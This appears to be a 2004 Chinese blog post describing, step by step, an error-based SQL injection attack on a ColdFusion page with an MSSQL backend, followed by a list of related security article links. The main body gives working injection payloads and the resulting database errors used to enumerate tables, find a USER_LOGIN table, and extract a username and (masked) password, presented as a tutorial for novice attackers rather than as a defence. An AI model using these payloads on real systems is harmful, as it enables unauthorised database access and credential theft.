对cfm的一个攻击实例

原创 2004年07月16日 15:45:00

好郁闷,快考试了,抽空上上网。到这个地址的时候,习惯性的看看他有没有安全漏洞
url.gif
http://www.test.com/openaccess/index.cfm?ID=11
提交
http://www.test.com/openaccess/index.cfm?ID=11;
返回
Error Occurred While Processing Request
Error Diagnostic Information
ODBC Error Code = 37000 (Syntax error or access violation)


[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword ’order’.


The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (72:1) to (72:47).


Date/Time: 06/05/04 13:37:57
Browser: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Remote Address: 61.178.21.189
Query String: ID=11;

其实cfm的攻击也和asp一样简单,看上面的返回信息,比asp的返回还详细。
不过好象对cfm很少有人写,所以就写出来了。上面是mssql的数据库,很多方法都可以用,
为了面向广大的菜鸟爱好者,这里就只说说怎么爆表吧。

对asp的跨cool大家都很熟悉了吧,那么,现在来cool一把cfm!!

提交:
and 0=(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)

郁闷,没返回我们期待的东西,他不给我,我就换方法要,再来。

提交:
and%201=(Select%20top%201%20name%20from(Select%20top%2012%20id,name%20from%20sysobjects%20where%20xtype=char(85))%20T%20order%20by%20id%20desc)

返回:
Error Diagnostic Information
ODBC Error Code = 22005 (Error in assignment)


[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’ANALYST_MST’ to a column of data type int.

The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (50:2) to (50:51).
。。。。。。
看到了吧,哈哈,小竹的这个语句就是猛啊!
现在就一个一个查吧,换掉top%201%20name中的1,从1开始,到6的时候,返回一个期待的东西
。。。。。。。
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’USER_LOGIN’ to a column of data type int.
。。。。。。。

看见USER_LOGIN表了吧?说不定就有密码在里面。
现在就看看里面有什么东西:(胜利就在眼前了,冲啊。。。)
提交:
and%201=(Select%20Top%201%20col_name(object_id(’USER_LOGIN’),1)%20from%20sysobjects)
返回:
。。。。。
Microsoft][ODBC SQL Server Driver][SQL Server]Line 2: Incorrect syntax near ’USER_LOGIN’.
。。。。。
我倒!!怎么这样!吸根烟再说。干脆用猜吧,像
and 1=(select%20user_id%20from%20USER_LOGIN)
猜不出来再说了。。。

出来了,哈哈,user_id,
连续提交,得到几个字段
user_id user password,没办法啊,100%的猜中率。
好了,已经到了最后一步了,我们继续来啊!!

and%200=(select%20user%20from%20USER_LOGIN%20where%20user>1)

出来了,用户是kimeng,下面爆他的密码:

and%200=(select%20password%20from%20USER_LOGIN%20where%20password>1)

哈哈,出来了,不好意思,马赛克处理*****

随便写写,没什么技术活。

http://www.itlearner.com/work/hexsql.asp

华为S9300交换机CFM和Y.1731配置

mep1:192.168.150.2 4/0/42 mep2:192.168.240.253 3/0/46 acsno  syacsno888   删除配置:undo cfm enable ...
  • lotus302
  • lotus302
  • 2014年08月05日 13:17
  • 1751

DNS 攻击方式及攻击案例

【赛迪网-IT技术报道】2010年1月12日晨7时起,网络上开始陆续出现百度出现无法访问的情况反馈, 12时左右基本恢复正常;18时许百度发布官方版本公告;对事故原因说明为:“因www.baidu.c...
  • swanabin
  • swanabin
  • 2013年11月16日 11:02
  • 2098

java-jar的格式

Manifest Default Manifest When you create a JAR file, the default manifest file simply contains t...
  • aBOUNTWINTER
  • aBOUNTWINTER
  • 2016年07月28日 19:41
  • 321

安全测试之XSS攻击

XSS (跨站脚本攻击)是什么?它的全名是:Cross-site scripting,为了和CSS层叠样式表区分所以取名XSS。是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码...
  • zzzmmmkkk
  • zzzmmmkkk
  • 2014年05月01日 15:52
  • 3327

一个简单XSS攻击示例及处理

最近项目被第三方工具扫描出来有一个Http head xss cross scripting漏洞,为了修复这个,顺便研究了一下跨站脚本攻击的原理, 跨站脚本攻击基本上就是sql注入的html版, 核心...
  • darkjune
  • darkjune
  • 2015年02月12日 16:03
  • 354

实例讲解黑客如何执行SQL注入攻击

一位客户让我们针对只有他们企业员工和顾客能使用的企业内网进行渗透测试。这是安全评估的一个部分,所以尽管我们之前没有使用过SQL注入来渗透网络,但对其概念也相当熟悉了。最后我们在这项任务中大获成功,现在...
  • lishimin1012
  • lishimin1012
  • 2015年01月27日 20:33
  • 775

XSS 攻击实验 & 防御方案

XSS 实验 不要觉得你的网站很安全,实际上每个网站或多或少都存在漏洞,其中xss/csrf是最常见的漏洞,也是最容易被开发者忽略的漏洞,一不小心就要被黑 下面以一个用户列表页面来演示...
  • is_zhoufeng
  • is_zhoufeng
  • 2016年05月22日 16:52
  • 11697

入侵139端口实例

今天打星际,被一高手反复摧残,郁闷ing……于是上网活动一下。打开肉鸡猎手,在开始IP和结束IP中填入想扫描的IP端,点击开始,不一会儿之后,两台肉鸡出现在我们面前(图一)。 现在,让我们点击“开始...
  • xing_anksh
  • xing_anksh
  • 2013年11月18日 14:21
  • 2678

web攻击XSS等

from: http://ifeve.com/javaee-http-2/# http://www.2cto.com/Article/201209/156182.html http://...
  • basycia
  • basycia
  • 2016年07月28日 14:55
  • 749

缓冲区溢出攻击实践

缓冲区溢出攻击方法是黑客入门的基础,本文以一个具体的实例一步步介绍如何进行最初级的缓冲区溢出攻击。...
  • linyt
  • linyt
  • 2015年01月30日 00:12
  • 14813
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章: 对cfm的一个攻击实例
举报原因:
原因补充:

(最多只允许输入30个字)